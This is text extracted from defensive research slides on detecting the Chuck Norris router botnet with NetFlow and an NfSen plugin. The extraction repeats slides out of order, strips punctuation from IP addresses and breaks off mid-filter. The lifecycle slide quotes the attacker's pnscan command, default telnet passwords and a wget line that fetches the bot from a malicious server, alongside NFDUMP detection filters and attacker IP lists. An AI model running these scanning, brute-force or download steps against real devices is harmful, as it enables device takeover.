NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
